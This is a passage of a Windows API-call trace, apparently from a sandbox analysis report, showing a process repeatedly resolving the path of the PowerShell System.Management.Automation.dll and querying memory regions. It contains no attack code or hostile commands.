lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.837] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xfb4c98d7, Data2=0xc2ca, Data3=0x4479, Data4=([0]=0x84, [1]=0xf6, [2]=0xce, [3]=0xb2, [4]=0xb5, [5]=0xc9, [6]=0xd, [7]=0x95))) returned 0x0 [0108.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.841] VirtualQuery (in: lpAddress=0x10b320, lpBuffer=0x10c1e0, dwLength=0x30 | out: lpBuffer=0x10c1e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.842] VirtualQuery (in: lpAddress=0x10b3b0, lpBuffer=0x10c270, dwLength=0x30 | out: lpBuffer=0x10c270*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.843] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.845] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.846] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.846] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.847] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.848] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.849] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.849] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.849] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.850] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.850] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.850] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.851] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.853] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.853] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.853] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.854] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.855] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.855] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.855] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xd793d22c, Data2=0xca51, Data3=0x4639, Data4=([0]=0x8b, [1]=0x26, [2]=0x1, [3]=0x91, [4]=0x15, [5]=0xc0, [6]=0x19, [7]=0x49))) returned 0x0 [0108.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.859] GetFullPathNameW (in: 